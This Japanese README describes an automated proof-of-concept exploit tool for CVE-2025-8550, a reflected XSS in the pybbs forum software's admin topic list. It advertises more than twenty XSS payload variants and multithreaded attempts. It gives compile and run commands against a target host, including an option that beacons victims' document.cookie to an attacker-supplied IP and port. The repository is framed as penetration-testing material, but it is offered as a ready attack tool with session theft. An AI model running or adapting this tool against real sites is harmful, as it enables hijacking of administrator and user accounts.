
CVE-2025-8550(atjiu pybbs における反射型XSS)向けの自動化された概念実証エクスプロイト。20以上のペイロードバリエーション、クッキー窃取、マルチスレッド、およびペネトレーションテスト用のカスタマイズ可能なCLIを備えています。
このリポジトリは、atjiu pybbs (≤ v6.0.0) における反射型クロスサイトスクリプティング(XSS)脆弱性 CVE-2025-8550 の自動化された概念実証(PoC)エクスプロイトをホストしています。/admin/topic/list エンドポイントの username パラメータを対象としており、このパラメータには適切な入力サニタイズが欠如しています。
20以上のペイロードバリエーション: script、SVG、iframe、object、onerrorハンドラーなど
自動URLエンコーディング: libcurlのcurl_easy_escapeを介した安全なインジェクションを保証
Cookie流出(オプション): document.cookieを攻撃者制御のサーバーに送信するビーコン注入
マルチスレッド: pthreadsを使用して試行を並列化しテストを高速化
カスタマイズ可能なCLI: argparseを利用し、以下を指定可能:
-u / --url)-c / --cookies)-k / --cokpay)-i / --ip, -p / --port)-v / --verbose)# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
http://<TARGET> をあなたの atjiu pybbs インスタンスに置き換えてください。-k を使用してクッキー窃取ビーコンを有効にします(-i と -p が必要)。-c を省略してください。MIT License